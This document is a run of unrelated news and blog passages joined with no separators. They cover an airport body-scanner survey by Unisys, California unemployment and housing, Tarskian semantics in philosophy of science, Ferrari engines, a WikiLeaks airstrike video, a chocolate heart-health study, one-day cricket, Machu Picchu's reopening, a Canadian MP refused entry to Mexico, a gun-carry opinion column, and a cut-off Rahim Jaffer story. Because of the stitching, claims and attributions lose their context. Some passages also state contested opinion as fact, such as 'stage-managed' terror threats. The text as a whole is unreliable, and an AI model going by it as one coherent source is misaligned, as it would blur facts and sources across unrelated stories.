All with similar sweeping joyous news of approximately 80 % of air travelers from these countries who just can't wait to get zapped and show their privates to security guards in order to catch their flight .
Reading the triumphant headlines , you'd be forgiven for believing the incredible turnaround in public support for invasive technology that has generated many serious concerns , including :
One only has to dig a little deeper into who is responsible for this survey to discover the profit - driven agenda of the company Unisys .
No surprises , it supplies products and services to support the implementation of increasing security systems at airports worldwide .
From the Unisys Website A Unisys press release on the same day as the survey results were announced , illustrates clearly the need for Unisys to gain acceptance for increased airport security to maximise its revenue : " Unisys Next Generation Airport Passenger Security Solution Delivers Enhanced Security for Air Travel Consumers Worldwide " Some facts about Unisys ' operation show some interesting connections and paint a picture of a company that uses corrupt lobbyists to win government contracts .
It has been accused of swindling the TSA to maximise revenue and it is an organisation who cares little for its American employees : Sound like a company that is genuinely concerned about helping travelers ?
Or more like one of the many that will employ a wide range of tactics to generate profits irrespective of the ethics ?
The actual report of the survey in question can be downloaded from Unisys and shows that the telephone survey collated it 's information from questions loaded with bias :
There are emotive and assumptive terms used in the above statement that ( even without knowing exactly how the questions were framed ) help explain the results that the media propagated :
Is ' some ' privacy sacrifice an accurate reflection of allowing total strangers to view images of you and your children naked ?
Is personal security actually enhanced when reports inform us of damming evidence on the ineffectiveness of this technology ?
The gradual introduction of increasing layers of airport security over the last ten years HAS had the effect of making travel extremely inconvenient .
There has been a carefully stage - managed succession of over - hyped and unsubstantiated terror threats .
Whether it be shoes , liquids or underpants , each has been followed by new inconvenient and ineffective security procedures .
None of these procedures are necessary and are simply excuses to implement increasingly invasive measures which use expensive technology .
If the survey question was more accurately worded perhaps it would read :
The results would be rather different , but as we know , the media shies away from reporting anything that does n't encourage the public to accept their taxes being used to profit the shareholders of companies in the ' Airport Security Industrial Complex ' like Unisys .
California has reached another unfortunate record .
The headline unemployment rate pushed up to a record breaking 12.6 percent .
This translates to 2.3 million Californians completely out of work .
We also have a large number that are working part - time but would like full - time employment .
When we look at the California budget and economy we cannot separate out jobs from the condition of the housing market .
California ’s big error during the decade was that the health of real estate was the health of jobs .
That is , many jobs ( too many ) depended on the housing bubble .
As the bubble burst so has the economy .
Yet the current strategy seems to rely on real estate recovering again instead of building up jobs in other industries .
If we look at the underemployment rate we are quickly approaching 24 percent .
We also have many toxic mortgages that are still sitting in the balance sheets of banks but more are making their way to market .
Let us first examine the employment situation in the state :
Source : BLS ; Yellow modified U6
I ’ve been putting together this chart for a few years now .
The red line is the official BLS headline unemployment rate for California .
But with such a large number of Americans working part - time but looking for full - time work , I ’ve also added a line that reflects the underemployment rate .
This data was created from averaging out the difference over the years between U3 and U6 for the state .
The ratio is fairly accurate .
In fact , let us look at the official 2009 average for California :
The average U6 rate for the state in 2009 was 21.1 percent .
But keep in mind and look at the above chart .
The headline rate ( U3 ) has been going up all through 2009 and now in 2010 we ’ve had a rate of 12.5 , 12.5 , and 12.6 percent .
In other words , the average is now much higher .
And we actually see this in the current part - time rate :
Source : OC Register
In the last year we ’ve increased the part - time for economic reasons number by 456,000 .
It is difficult to envision any housing stability without the employment situation improving .
How are people going to afford any sort of mortgage payment if they have no job or are working part - time with lower wages ?
At the moment , we have seen a movement in home sale activity but much of this seems to come from a couple of unsustainable groups :
- a. Investors
- b. First time buyers using the tax credits ( federal currently , state next month )
- c. Low mortgage rate push
-d. Pent up demand
All four groups are currently dominating the market .
In most healthy markets sales come from people selling homes to move up / out and first time buyers .
We are missing a large healthy group of home sales that come from the move up market .
After all , what are you going to move up from when one - third of California mortgage holders are underwater ?
What is even more challenging for the current economy is we are reaching the end of the line for many .
In the next few weeks we are going to see roughly 100,000 people lose their unemployment insurance :
“ ( LA Times ) Despite hints of an economic turnaround , some of the 2.3 million unemployed in the state found March the toughest month yet .
That ’s because tens of thousands have been out of work so long that their unemployment checks will be cut off within the next few weeks .
They ’re not helped by the $ 18 - billion measure signed Thursday by President Obama that extends jobless benefits for many Americans through June 2 . ”
Many of these people are part of the 2.3 million unemployed :
Source : EDD
The recession has been so long and deep , that even 99 weeks of unemployment insurance with combined extensions is not enough for thousands of California residents .
A current extension signed by the President will not help this group .
And with budget battles looming for cities and the state , it will be a struggle of priorities .
Why choose to give a $ 200 million home buyer tax credit when our employment situation resembles the above is beyond me .
It is a purely political move because economically it makes absolutely no sense .
And Southern California is in really tough shape .
Many of those investors have been buying out in the Inland Empire :
Source : OC Register
The Inland Empire is made up of Riverside and San Bernardino Counties with headline unemployment rates of approximately 15 percent which means their underemployment rate is 25 percent or higher .
I ’ve been following this market closely and have seen an explosion of rentals hitting the market .
Yet the economy is so tough here , that many rentals seem to languish or if they do get rented , investors are finding a hard time collecting rent .
This might be because the underemployment rate is 25 percent !
It should be obvious to most that we can have no housing recovery without fixing the current employment situation in the state .
And here in Southern California , we are seeing some shadow inventory move from the dark hidden corners of a bank balance sheet to the MLS :
So what we see is a decrease in shadow inventory and a bump in actual MLS data .
This trend has been going on for a few months now .
Yet the properties making their way look to be hand selected .
For example , banks seem to want to move shadow inventory in the Inland Empire fast and at lower prices .
In other areas , not so much ( i.e. , Beverly Hills , Culver City , etc ) .
It would appear that banks are already giving up on certain areas and crossing their fingers that in other markets , things will recover quick enough and then they can unload properties at face value .
The California budget battle is going to give us two choices .
One includes raising taxes to generate more revenues .
The other will include cuts which means additional job losses .
These are not good choices but this is what we have ahead of us in 2010 .
Did You Enjoy The Post ? Subscribe to Dr. Housing Bubble ’s
Blog to get updated housing commentary , analysis , and information .
Accuracy , Applicability , and Tarskian Semantics
by Erik Curiel ( Guest Post )
First is a concise statement of my problem with contemporary accounts of those semantics , as based on the idea of truth as , in some sense , prior to that of meaning .
Second is my problem with Tarskian semantics in particular , which seems to be far and away the most popular formal theory of semantics used to construct particular accounts of the semantics of scientific theories , no matter what else the philosopher using it thinks about semantics
I. Scientific Semantics as Based on Notions Like Truth
Carnap , in the Introduction to Semantics ( ch.B , § 7 , p.22 ) concisely expresses the seductive intuition that grounds essentially all contemporary thought on the semantics of scientific theories :
… to understand a sentence , to know what is asserted by it , is the same as to know under what conditions it would be true .
As appealing as this idea is , its naive application leads to severe problems .
This is so no matter the details of the architectonic form of one ’s account of a theory and its semantics , whether it falls , e.g. , under the purview of either the syntactical or the semantical account of scientific theories and their semantics , or some other view entirely , so long as the foundation of that view takes as ineliminable a concept such as truth that must be grounded on accuracy of prediction .
My gripe is not with any particular conception of truth , nor with the idea of truth itself .
Truth is just the notion that specific instances of the generic form of semantics I oppose most commonly employ in their respective foundations — that genus of semantics that attributes semantic content to a theoretical representation based on the accuracy of the fit of its predictions to the results of the empirical , quantitative measurements made on the system it purports to model .
In other words , my argument is with accounts of semantics that make semantic content devolve in the end upon the accuracy of a theory ’s models , irrespective of how exactly it is that the accuracy comes into play in fleshing out the theory ’s semantic relations and content ( as justifying referential relations , as characterizing adequacy , as being required for truth , or what have you ) .
The heart of the problem is that such accounts cannot differentiate inaccuracy from inapplicability as a defect in a theoretical representation of a physical system : a semantics grounded on a notion like truth can rule a model of a system inadmissible only on the grounds that it does not model the behavior of the system accurately enough .
That , however , is too coarse - grained a measure of the way models can fail to provide semantically sound representations of physical systems .
Consider the example of a model of a body of liquid as provided by the classical theory of fluid mechanics .
When the liquid is not too viscous , is in a state near hydrodynamical and thermodynamical equilibrium and the level of precision and accuracy one demands of the model is not at too fine a spatiotemporal scale , then the classical theory yields excellent models of the liquid ’s behavior over a wide range of states and environments .
When the state of the liquid , say , begins to approach turbulence , the representation the theory provides begins to break down .
It does so , however , in a subtle way , one that cannot be wholly accounted for by adverting merely to the fact that the theory ’s model becomes inaccurate .
In particular , there is a regime in which the dynamical equations of motion of the theory no longer provide accurate predictions by any reasonable measure , and yet all the quantities the theory attributes to the liquid , and all the kinematical constraints the theory jointly imposes on those quantities ( e.g. , the continuity of mass - density , the conservation of energy , etc. ) , will still be satisfied .
In a strong sense , then , the theory can still provide a meaningful — and appropriate — model of the liquid even though the model is not adequately accurate .
A semantics whose fundamental terms require , by way of relation to empirical phenomena , no more than accuracy in prediction ( as do all those grounded on truth , referential relations , and so on ) , however , cannot admit such models as part of the theory , period , for the models are not accurate .
This view is inadequate for ( at least ) two reasons .
First , it does not allow us , within the scope of the theory itself , to understand why such models are not sound even though all the quantities the theory attributes to the system are well defined and the values of those quantities jointly satisfy all kinematical
constraints the theory requires .
Second , we miss something fundamental about the meaning of various theoretical terms by rejecting such models out of hand merely on the grounds of their inaccuracy .
It is surely part of the semantics of the term `hydrostatic pressure ’ , e.g. , that its definition as a physical quantity treated by classical fluid mechanics breaks down when the fluid approaches turbulence ; because , however , the theory ’s equations of motion stop being accurate long before , in a precise sense , the quantity loses definition in the theory , any semantics that rejects the inaccurate models in which the term still is well defined will not be able to account for that part of the term ’s meaning .
Thus , an adequate semantics for physical theory must be grounded on notions of meaning derived from relations in some sense prior to the accuracy of the theory ’s representations of the dynamical behavior of the physical systems it treats , relations that govern the applicability of the theory ’s representational resources to the system at issue .
II . Tarskian Semantics
Let ’s take , at a minimum , Tarskian semantics as applied to scientific theories to require the following :
a theory is ( characterized by ) the collection of its ( Tarskian ) models the semantic content of the theory is completely exhausted by the association of each model to the ( possible ) systems it adequately represents
In particular , no semantic content of intrinsic physical significance can accrue to the theory in virtue of relations among its models .
It is usual to take a model to be fully characterized by a solution to the theory ’s equations of motion , and , indeed , I see no other reasonable way to go .
Tarskian semantics then has the consequence that no structure intrinsic to the family of all solutions to the equations of motion can have semantic content of intrinsic physical significance .
This seems prima facie wrong .
Families of models ( classes of solutions to the equations of motion ) may have on their own semantic content that forms part of the semantic content of the theory but that is not formulable in a traditional Tarskian semantics .
For example , the claim that the equations of motion have a well set initial - value formulation in the sense of Hadamard indubitably informs part of a theory ’s semantic content , but it is one that , in its essence , consists of relations among models and cannot be reduced to the interpretation of a single model .
Thus , the simple aggregation of the meaning of all individual models does not exhaust the semantic content of a theory .
Erik Curiel is a philosopher at London School of Economics , specializing in philosophy of physics , philosophy of science , and ancient philosophy .
For more on Curiel ’s work , visit his homepage .
Share this article on LinkedIn Email
Ferrari is adamant there are no reasons to be worried about the reliability of its engines following an in - depth analysis on its failures in Malaysia .
Fernando Alonso was forced into retirement from the Sepang race after his power unit failed with two laps to go , on the same weekend that the Sauber team , also using Ferrari units , suffered engine problems .
The team had made precautionary engines changes in the season - opening Bahrain Grand Prix , leading to fears about its engine allocation for the rest of the season .
Ferrari said on Tuesday , however , that the engines have no issues and they will be used again in this weekend 's Chinese Grand Prix .
And engine chief Luca Marmorini also revealed that the problems suffered by Alonso in Malaysia were probably related to the fact that he had to use it differently due to a problem with his gearbox .
" We have carried out an in - depth study into what happened and the two problems are not related to one another , " Marmorini told Ferrari 's website .
" In Sepang , Fernando 's engine suffered a structural failure , of a type we had never seen during the winter .
" We believe there was a role played by the unusual way in which the driver had to use the engine during the race , because of the gear selection problems he experienced right from the start .
Additionally , there is no connection with the problem the Sauber team experienced on the engine front at the last race , which we believe was down to an issue with electronic sensors .
" Each car has eight engines it can use per driver over the season and we plan our useage strategy around this .
As a precaution , we opted not to use the Bahrain race engines in Australia , but they will be used in China , having concluded that they are fit for purpose , despite what happened at the Sakhir circuit . "
Marmorini , whose team is leading both championships ahead of the Shanghai race , says the Maranello outfit has reasons to be very pleased about its pace so far .
" I 'm happy because I think the Ferrari package is quick , even if it could always be quicker of course , " he added .
" Having said that , our pace in the race can give cause for satisfaction on the engine and car side , even if we still have much work to do on the engine front , getting even more out of it , working within the restrictions of the current regulations . "
The engine boss also admitted it has been very hard to judge the unit 's true performance so far given the unusual race conditions .
" Unfortunately , I would say that so far , it is impossible to have a clear picture of how this side of the package is working , as there has not been a single race weekend not affected by the weather , " Marmorini said .
" In wet conditions , fuel consumption is a bit harder to control and becomes a less important factor .
" It 's fair to say we have done a good job so far , based on work carried out last winter , but we continue to work on this aspect of engine behaviour to improve still further .
Once we have a race weekend that is completely dry , we will get a clearer picture of where we stand . "
With the Obama Administration scrambling to dismiss last week ’s WikiLeaks.org video of the July 12 , 2007 US killings of two Reuters reporters and several other Iraqi civilians , the increasingly controversial site is poised to drop another video bombshell , this time on a much more high profile attack .
On May 5 , 2009 , US aircrafts bombed a number of homes in the Afghan village of Abdul Basir Khan , in Farah Province .
The death toll according to Afghan officials was upwards of 140 civilians .
The Pentagon initially claimed that the entire incident was made up and that the Taliban had pre-killed all the civilians and stored the bodies in buildings before tricking the US into bombing those buildings .
They later conceded to have killed 26 people , but insisted that “ no one will ever ” know the exact numbers .
They also claimed that the planes had no idea any civilians were in the area .
Exactly what is on the video is unknown at present , but last week ’s video showed that military claims that the Reuters employees were killed in a “ battle ” were shown as demonstrably false , as there was never a battle and the helicopters clearly attacked a group of people walking casually down the street .
Centcom insisted that the Iraq video was “ taken out of context . ”
Secretary of Defense Robert Gates likewise admitted that the video was “ unfortunate ” but insisted that the troops had acted appropriately and that the matter would not harm the US image abroad .
Since the release of the video WikiLeaks ’ profile has grown enormously , but so has the harassment it faces from the intelligence community .
The group says that its employees are under growing surveillance and one of their volunteers was even detained by police for 21 hours .
LONDON ( Reuters ) - Easter eggs may be good for you , but only if you eat small ones made from cocoa-rich dark chocolate , according to the latest in a string of scientific studies to show potential health benefits of chocolate .
Employees at " Patisserie Abidjanaise " wrap chocolate Easter eggs in Abidjan , March 20 , 2008 .
REUTERS / Thierry Gouegnon
German researchers studied more than 19,300 people over a decade and found those who ate the most chocolate -- an average of 7.5 grams a day -- had lower blood pressure and a 39 percent lower risk of having a heart attack or stroke than those who ate the least amount of chocolate -- an average of 1.7 grams a day .
But , the difference between the two groups was just under six grams ( 6g ) of chocolate a day , less than one small square of an average 100g bar , they wrote in a study in the European Heart Journal to be published on Wednesday .
Brian Buijsse of the German Institute of Human Nutrition in Nuthetal , who led the study , said people should not use his work as an excuse to stuff themselves with chocolate .
“ Small amounts of chocolate may help to prevent heart disease , but only if it replaces other energy - dense food , such as snacks , in order to keep body weight stable , ” he said .
Although they said more work needed to be done to be sure , the researchers think the flavanols in cocoa may be the reason why chocolate seems to be good for blood pressure and heart health -- and since there is more cocoa in dark chocolate , dark chocolate may have a greater effect .
VEGETABLES , WINE AND COCOA
Flavanols are a class of the antioxidant flavonoids that are found in many vegetables , cocoa and red wine .
“ Flavanols appear to be ... responsible for improving the bioavailability of nitric oxide from the cells that line the inner wall of blood vessels , ” said Buijsse .
Nitric oxide is a gas that , once released , causes the smooth muscle cells of the blood vessels to relax and widen , he said , adding that this may contribute to lower blood pressure .
For their chocolate study , the researchers used data from participants of a larger study called European Prospective Investigation into Cancer ( EPIC ) .
They followed more than 19,300 over more than 10 years during which time their blood pressure , height and weight measurements as well as details of their diet , lifestyle and health were recorded .
Buijsse said put in terms of absolute risk , the findings showed that if people in the group eating the least amount of chocolate increased their chocolate intake by six grams a day , 85 fewer heart attacks and strokes per 10,000 people could be expected to occur over a period of about 10 years .
Commenting on the study on behalf of the European Society of Cardiology , Frank Ruschitzka of Switzerland ’s University Hospital Zurich said basic science had now demonstrated “ quite convincingly ” that dark chocolate with a cocoa content of at least 70 percent reduces some kinds of stress and can improve blood flow and blood pressure .
But he said : “ Before you rush to add dark chocolate to your diet , be aware that 100 grams ... contains roughly 500 calories .
“ You may want to subtract an equivalent amount of calories by cutting back on other foods to avoid weight gain . ”
We not only have Australia to thank for the clapperboard , pre-paid postage , zinc cream , the super sopper and bionic ear , but the modern - day incarnation of one - day cricket .
True , the first limited overs competition was held in England in the early 1960s , but it was Australia - and namely , Kerry Packer - which brought the format to technicolour life in the late 1970s with World Series Cricket .
Floodlights , coloured pyjama clothing , mass marketing ( including the anthem - like C'mon Aussie C'mon ) , mass merchandising , and big dollar remuneration for once lowly - paid cricketers .
All are legacies of the Packer revolution .
But is Australia now witnessing the slow death of the 50 - over format ?
Certainly , the attendance figures suggest it is in serious trouble , with even sports - mad Melbourne turning its back on the game .
Only 25,643 turned up at the Melbourne Cricket Ground on Sunday for the one - day international between Australia and the West Indies , its lowest ODI crowd in almost thirty years .
By contrast , 60,054 turned up at the MCG for a Twenty20 international only 24 hours before .
The television ratings are also down .
Channel Nine , which has held the exclusive broadcasting rights to cricket ever since the Packer take - over , trailed third in the ratings on Sunday night when it aired the one - day international .
The rise of microwave cricket has been the sports story of the southern summer , with the interstate Twenty20 competition , the Big Bash , an instant success .
For a game between Victoria and Tasmania , 43,125 people turned up at the MCG , while tens of thousands have also converged on the Olympic Stadium in Sydney to watch this abbreviated version of the game .
The cricket is usually agricultural , and can be ugly to the point of disfigurement , but even for purists there 's a guilty pleasure in seeing the ball smacked to all parts of the ground .
The 50 - over game , in contrast , is stuck in a sort of cricketing no mans land : lacking the instant , knock - out thrills of Twenty20 or the slow - cooked flavour and nourishment of Test cricket .
Cricket Australia , which has limited to three the number of Twenty20 internationals , has mounted a " comprehensive review " .
The irony is that one - day cricket is the only form of the game in which Australia retains its global dominance - which reinforces the argument of previous blogs that Aussie sports fans are not as victory - orientated as is commonly assumed .
Some have argued for a global league system to increase the popularity of the 50 - over game .
Or perhaps it is time to split ODIs into four separate innings , which might heighten the drama .
Maybe it is time to ditch 50 - over cricket , and focus on test and Twenty20 .
While we are on the subject of cricket , the southern summer has proven to be unexpectedly interesting and exciting .
The Sydney test , which saw an extraordinary Australian fight back against Pakistan , will live in the memory for decades to come , while the West Indies were by no means a push - over .
Both series demonstrated once more how the comparative decline of the Australian side has helped enliven test cricket .
And talking to a lot of Aussie fans , they enjoy watching tension - filled cricket after a decade , more or less , of lop - sided results .
In the context of the ongoing debate about racial attitudes in Australia , it is also worth pointing out that the Pakistan and West Indies passed without incident .
Indeed , the main crowd - related story of the summer has been the over - officiousness of police and stewards rather than the unruliness of the spectators .
On that note , the only time that I have been to a ODI this season I spent almost as much time watching the stewards puncture beach balls as the game itself .
Great entertainment , and arguably more so than the 50 - over game .
Machu Picchu , Peru 's top tourist site , was closed for two months
By Dan Collyns
BBC News , Machu Picchu , Peru
You do not have to be an archaeologist to figure out that the Incas did not have hordes of visitors in mind when they constructed Machu Picchu .
Built 2,500 m above sea level on an almost vertical , thickly forested mountain top , the 15th - Century ruin was a sacred site that almost certainly served as an astronomical observatory for the sun-worshipping Incas .
Its location is partly why it is so breathtakingly stunning and adds to the magical allure that draws nearly a million tourists a year .
But it is also the reason why Peru was forced to close it off to all visitors throughout February and March this year after the railway that connects it with the rest of the country was damaged by mudslides and flooding .
Financial loss About 4,000 tourists were stranded for several days in Aguas Calientes - the town underneath the ruins - at the end of January , until they were airlifted out in Peruvian Air Force helicopters .
The reopening of Machu Picchu at the beginning of April was cause for genuine celebration among Peruvians .
This disaster has been more disruptive to our industry than the financial crisis and swine flu combined
Richard Leon
Peru for Less
As sunshine turned to showers a few hundred tourists wandered among the ruins , among them the Hollywood actress , Susan Sarandon , who had been invited by the Peruvian government to lend the event some star quality .
Beyond the symbolic significance , the reopening should start to stem a loss of revenue that Peru's Tourism Minister Martin Perez told the BBC amounted to some $ 185 m ( £ 122 m ) for the two - month closure .
It will also revitalise the nearby city of Cuzco , which has been operating at 30 % capacity .
More than half the 400,000 - strong population rely on tourism for a living , according to Roger Valencia , vice - president of the city 's chamber of commerce .
Infrastructure plans
Although the region has other sources of income , tourism is the big employer here with everyone from hotel owners to street vendors relying on the daily flow of about 2,000 tourists who visit Machu Picchu .
" This disaster has been more disruptive to our industry than the financial crisis and swine flu combined " , said Richard Leon , director of travel company Peru For Less .
Tourists had to be airlifted out after mudslides and flooding " Almost every one of our clients plans on visiting Machu Picchu during their trip and more than 800,000 people visited the site last year , so the recent closure has caused us significant problems .
" Although they did a great job in evacuating people from the area , it 's clear that the authorities were not prepared for problems on this scale , despite warnings that the infrastructure was at risk . "
Mr Perez says he is the first to admit that the Incas built Machu Picchu in " a very difficult place " .
But he told the BBC that infrastructure was now a priority and that a new road to Machu Picchu was under construction .
He also mentioned setting up helicopter access .
Talk of more routes sets off alarms bells for the UN 's cultural body , Unesco , which has in the past warned that uncontrolled access could damage the World Heritage Site .
Imbalance But the Peruvian authorities appear to have thought of that .
The country 's National Institute of Culture ( INC ) announced it would ration the number of entry tickets to Peru 's most popular tourist destination .
What is clear is that Machu Picchu is zealously coveted by an array of entities , both national and international .
The crisis caused by its closure prompted calls from the tourism industry to break its over - dependence on Machu Picchu and diversify the sector .
American actress Susan Sarandon lent star quality to the reopening " Machu Picchu is a breathtaking place to visit , but sites like Choquequirao and Kuelap are equally impressive and receive a fraction of the visitor numbers , " said Richard Leon .
" I 'd like to see more investment in these other sites to help address the imbalance and overemphasis on Machu Picchu . "
But for now all seem united in breathing a sigh of relief that the ruins are undamaged by the heavy rains and once more open to the public .
" It 's not only a national treasure .
It 's in Peru but we have to take care of it for all of humanity , " said Mr Perez .
Machu Picchu is Peru 's strongest brand , a national symbol , an enigma , an archaeological wonder , even - for some - a source of mystical powers .
For now - the desert geoglyphs known as the Nazca lines , Lake Titicaca , the Colca Canyon , the Lord of Sipan tombs , the Kuelap fortress - will continue to play second fiddle to Machu Picchu .
The number of holidays cancelled by European , Japanese and US tourists is clear evidence that for almost all first - time travellers to Peru , it 's Machu Picchu or bust .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Hyer denied entry into Mexico
NDP MP Bruce Hyer got bounced from Mexico .
Hyer , who represents Thunder Bay - Superior North , travelled with his wife Margaret earlier this month for a sunny vacation at San Miguel de Allende , but did n’t make it out of the Mexico City airport .
NDP MP Bruce Hyer got bounced from Mexico .
Hyer , who represents Thunder Bay - Superior North , travelled with his wife Margaret earlier this month for a sunny vacation at San Miguel de Allende , but did n’t make it out of the Mexico City airport .
Hyer , it seems , was travelling with a special green passport given to MPs instead of the normal blue one non-governmental Canadians are issued .
But because Prime Minister Stephen Harper enacted legislation last year that requires Mexicans wishing to travel to Canada to get visas , the Mexicans responded with new rules of their own .
Canadians travelling on the special green passports now require a visa of their own .
" To my shock and surprise , Mexico has done retaliation for the visas required for Mexican tourists and students and business people coming to Canada , by imposing a requirement for visas of government people going to Mexico , " Hyer said , when reached by phone on Thursday morning .
" The Mexicans are too smart to penalize tourists going to Mexico but the hit - back behaviour that they chose to do , unbeknownst to me , was that government diplomats or people with special passports are supposed to have visas ahead of time . "
Hyer said there ’s no doubt in his mind why he was refused entry into Mexico .
" It was made very clearly to me by the immigration people that they were not very happy with Mr. Harper and his government ’s decision to require visas of Mexicans with no notice last summer , " Hyer said .
However , he was the first to admit it was his own mistake , and that he should have known the rules before he left the country .
" If I had just grabbed the other passport instead of the special green one , life would be good , " Hyer said , still managing to chuckle at the situation .
" I was a little undecided .
It was mostly a holiday for me , but I also was going to do some work with Mexican government officials and other people interested in climate change , " Hyer said .
Although his vacation plans and climate change meetings were kiboshed , Hyer does n’t plan to hold a grudge against his North American neighbours .
He said he will be back , perhaps as soon UN climate change talks scheduled for Cancun in November .
" I ’m not mad at the Mexicans .
I truly understand why they ’ve done what they ’ve done and have some empathy of their position .
If I were to be critical of anybody , it would be of our own government that has taken a friend in Mexico and turned them into less of a friend , " said Hyer , adding that the prime minister seems to be following in the footsteps of former U.S. president George .
W. Bush , whose policies he said have alienated countries around the world .
" Canada used to have a wonderful reputation around the world , and our reputation is becoming tarnished in other places , and that ’s really unfortunate . "
Originally published at Notes from the bunker ….
You can comment here or there .
What would YOU pay for a pair of Steiner 7×50 M22 binoculars with reticle and LPF ?
I only ask because .. well … there was a pair at the gun show .
Chuck Baldwin
March 2 , 2010
The major news media was replete with reports over the weekend that the coffee company , Starbucks , “ has no problem with customers packing heat while placing their orders . ”
12 states allow unrestricted open carry .
“ The coffee giant says it wo n’t take issue with gun owners who take advantage of ‘ open carry ’ laws and bring firearms into their restaurant . ” ( Source : NBC News )
To tell you the truth , I ’m not sure why this is even considered “ newsworthy . ”
Perhaps because Starbucks is a Seattle - based company that caters to the “ yuppie ” crowd ?
Maybe because the anti-gun national news media is shocked and chagrined at Starbucks ’ statement ?
Who knows ?
That Starbucks would not want to alienate millions of gun owners ( many of whom lawfully carry concealed weapons for personal protection ) makes perfectly good sense to me .
I ’m sure the statement by Starbucks has little to do with guns and everything to do with business .
But the fact is , there are tens of thousands of lawfully armed citizens who carry either concealed or open that have been peacefully doing business with thousands of companies around the country for years .
At last glance , 12 states allow unrestricted open carry .
Those states are Alaska , Montana , Idaho , Wyoming , Nevada , Arizona , New Mexico , South Dakota , Vermont , Kentucky , North Carolina , and Virginia .
Plus , at least 13 other states allow restricted open carry ( meaning a permit is required ) .
I know it infuriates gun-grabbing liberals to admit this , but the facts are absolutely undeniable that an armed citizenry is far and away a more civilized and peaceful citizenry .
Founding Father , author of the Declaration of Independence , and our third President Thomas Jefferson rightly said , “ Laws that forbid the carrying of arms . . . disarm only those who are neither inclined nor determined to commit crimes . . .
Such laws make things worse for the assaulted and better for the assailants ; they serve rather to encourage than to prevent homicides , for an unarmed man may be attacked with greater confidence than an armed man . ”
Founding Father , the man called “ the father of the U.S. Constitution , and our 4th President James Madison , agreed with Jefferson .
He wrote in Federalist , Number 46 , “ [ The Constitution preserves ] the advantage of being armed , which Americans possess over the people of almost every other nation . . . [ where ] the governments are afraid to trust the people with arms . ”
Founding Father and author of the classic Revolution - era books , “ Common Sense ” and “ Rights of Man , ” Thomas Paine concurred .
He said , “ Arms discourage and keep the invader and plunderer in awe , and preserve order in the world as well as property . . .
Horrid mischief would ensue were the law - abiding deprived of the use of them . ”
And should there be any doubt in the minds of sincere men regarding the advantages and appropriateness of an armed citizenry , the research of John R. Lott , Jr. is more than sufficient to dispel it .
Lott is a senior research scientist at the University of Maryland , College Park .
He was previously the John M. Olin Visiting Law and Economics Fellow at the University of Chicago Law School .
His book , “ More Guns , Less Crime : Understanding Crime and Gun Control Laws , ” is the most authoritative and thoroughly researched volume on the subject .
And the title of his book is exactly what his research proves :
More guns , less crime !
A d v e r t i s e m e n t
{openx:49}
Lott ’s analysis “ is based on data for all 3,054 counties in the United States during 18 years from 1977 to 1994 . ”
Lott said carry laws reduce violent crime because “ victims who have guns are in a much better position to defend themselves . ”
DUH !
See a University of Chicago - sponsored interview with Mr. Lott at :
http://www.press.uchicago.edu/Misc/Chicago/493636.html
Of course , liberal gun-grabbers love to instill fear into people by saying that citizens carrying guns will result in more incidents of violence .
However , the facts just do not substantiate this hysteria .
Even our local “ mullet wrapper ” recently ran a column excoriating the new law that allows concealed carry permit holders to carry his or her sidearm in national parks and forests .
The basis of their diatribe ?
“ It ’s a risky change that will endanger families , hikers , those who work in these places and the park rangers themselves . ”
See the rant at :
http://www.pnj.com/apps/pbcs.dll/article?AID=20102260311
Like all gun-grabbers , however , the fearmongering of the editorial board at the Pensacola , Florida , News Journal just does not square with the facts .
As Lott observes , “ Criminals are deterred by higher penalties .
Just as higher arrest and conviction rates deter crime , so does the risk that someone committing a crime will confront someone able to defend him or herself .
There is a strong negative relationship between the number of law - abiding citizens with permits and the crime rate–as more people obtain permits there is a greater decline in violent crime rates .
For each additional year that a concealed handgun law is in effect the murder rate declines by 3 percent , rape by 2 percent , and robberies by over 2 percent . ”
Accordingly , the new law allowing concealed carry permit holders to carry in national parks and forests serves only to make those parks and forests safer .
I well remember being invited to speak in the rural Montana town of Hamilton last year .
Somewhere between 600 and 800 people assembled at the local fairgrounds to hear me speak .
It was a terrific rally with some of the most patriotic and enthusiastic people I have ever spoken to .
( They have invited me back to speak , this time at the University of Montana in Missoula , to a much larger crowd of probably several thousand later this May . )
Along with the vibrancy , energy , and sheer enthusiasm of that audience I observed that scores of people were openly carrying handguns on their hips .
( No telling how many people were carrying concealed .
Scores more , I ’m sure . )
Can one imagine a would - be killer trying to open fire in that meeting ?
Needless to say , not only did I feel at home , I felt absolutely safe–a whole lot safer than I feel when I travel to Washington , D.C. ( or any other city or State restricting gun possession ) , that is for sure !
Obviously , the executives at Starbucks are wiser and more discerning than a majority of newspaper editors and television news anchors .
They have seen several other business establishments that have introduced corporate policies prohibiting lawfully armed citizens from entering their establishments–and they ’ve seen their profits and customer bases shrink dramatically !
They ’ve also , no doubt , seen what happened in Luby ’s Cafeteria in Killeen , Texas , when a madman crashed his vehicle into the restaurant and began shooting patrons at will .
The total carnage on that horrific day back in 1991 resulted in 23 people dead and 20 more wounded , and the killer eventually killing himself .
Some 80 people were in the restaurant when the shooting occurred , but Texas did not have a concealed carry law at the time , so no one was armed and able to fight back .
At this point , I strongly urge readers to watch the eyewitness testimony of former Texas State Representative Dr. Suzanna Gratia - Hupp–whose parents were killed in the Luby ’s Cafeteria rampage–given before the US Congress .
See her testimony at :
http://www.youtube.com/watch?v=WznSA4EU1Gk
Therefore , the sadness and chagrin of liberal gun-grabbers notwithstanding , I say , “ Hooray for Starbucks ! ”
And I do n’t even like their coffee .
Maybe I ’ll give them another chance .
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
This material is subject to legal complaint by Nazim Gillani .
Nazim Gillani of International Strategic Investments , four business associates , and three busty hookers dined in style last Sept. 10 .
Former MP Rahim Jaffer , a self - described peddler of government grants , credits and loans , was in fine form , chatting up prospective clients .
Early the next morning , Gillani would greet the day with a colourful email to the night ’s guests : “ Mr. Jaffer has opened up the Prime Minister ’s office to us , ” he boasted , unaware at the time of how Jaffer ’s night had ended .
Gillani is a character .
By last September , at least two major police departments and the federal taxman were after him on fraud or tax evasion allegations .
Sixty kilometres north of the dark wood panelling of Harbour 60 , a dozen Ontario Provincial Police officers were setting up a RIDE check , a routine stop and sniff assignment that is the bread and butter of the Caledon OPP detachment .
Sgt. Mike Garant was the boss .
Ten - year veteran Kim Stapleton , a by - the - book officer , was also on duty .
Often praised for her work , Stapleton was one of a group of OPP officers selected to travel to the Olympics to work on a security detail in the new year .
With other Caledon officers that night , she set up a highly visible RIDE checkpoint just north of the road that snakes past the Pumpkin Patch Childcare Centre .
